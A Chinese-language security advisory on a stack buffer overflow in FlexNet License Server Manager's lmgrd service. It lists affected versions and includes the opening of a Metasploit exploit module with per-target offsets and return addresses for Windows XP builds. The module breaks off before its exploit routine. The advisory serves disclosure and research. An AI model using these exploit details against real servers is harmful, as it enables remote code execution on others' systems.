FlexNet License Server Manager 'lmgrd' 组件栈缓冲区溢出

发布日期：2012-03-26
更新日期：2012-05-23

受影响系统：
Flexera FlexNet License Server Manager 11.9.1
不受影响系统：
Flexera FlexNet License Server Manager 11.10
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52718

Flexera是应用程序用法管理的战略解决方案提供商。FlexNet Publisher提供了自定义定价、软件包和软件许可条款的技术，也可防止未授权使用。lmgrd是在端口27000上监听的许可证服务器管理器，作为多种产品的系统服务运行。

FlexNet Publisher的lmgrd License Server Manager在实现上存在漏洞，发送特制的报文到服务器可造成栈溢出，导致执行任意代码。

<*来源：Luigi Auriemma （aluigi@pivx.com）
 
  链接：
       
       
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Luigi Auriemma （aluigi@pivx.com）提供了如下测试方法：

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FlexNet License Server Manager lmgrd Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the FlexNet
        License Server Manager.

The vulnerability is due to the insecure usage of memcpy
        in the lmgrd service when handling network packets, which
        results in a stack buffer overflow.

In order to improve reliability, this module will make lots of
        connections to lmgrd during each attempt to maximize its success.
      },
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'Alexander Gavrun', # Vulnerability Discovery
          'juan vazquez', # Metasploit module
          'sinn3r' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '81899' ],
          [ 'BID', '52718' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload' =>
        {
          'Space' => 4000
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Debug', {} ],
          [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
            {
              'Offset' => 10476,
              'ShellcodeOffset' => 5504,
              'Ret' => 0x0047d01f # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
            {
              'Offset' => 7324,
              'ShellcodeOffset' => 2332,
              'Ret' => 0x004eda91 # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
            {
              'Offset' => 7320,
              'ShellcodeOffset' => 2328,
              'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
            }
          ],
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 23 2012'))